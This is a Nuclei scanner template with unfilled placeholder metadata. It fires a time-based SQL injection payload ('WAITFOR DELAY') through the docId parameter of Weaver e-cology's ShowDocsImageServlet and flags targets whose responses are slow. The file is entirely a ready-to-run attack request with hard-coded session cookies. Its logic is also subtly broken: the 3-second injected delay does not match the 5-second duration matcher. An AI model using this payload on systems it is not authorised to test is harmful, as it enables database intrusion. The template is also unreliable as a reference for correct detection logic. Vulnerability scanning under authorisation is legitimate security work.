id: docId_SQL
info:
  name: Template Name
  author: weehhd
  severity: high
  description: description
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=4+WAITFOR+DELAY+%270%3A0%3A3%27 HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: ecology_JSessionId=abcn2SJzWWTjb82P4eCXy; JSESSIONID=abcn2SJzWWTjb82P4eCXy; ecology_JSessionid=abcn2SJzWWTjb82P4eCXy
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - JFIF
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
      - type: dsl
        dsl:
          - 'duration>=5'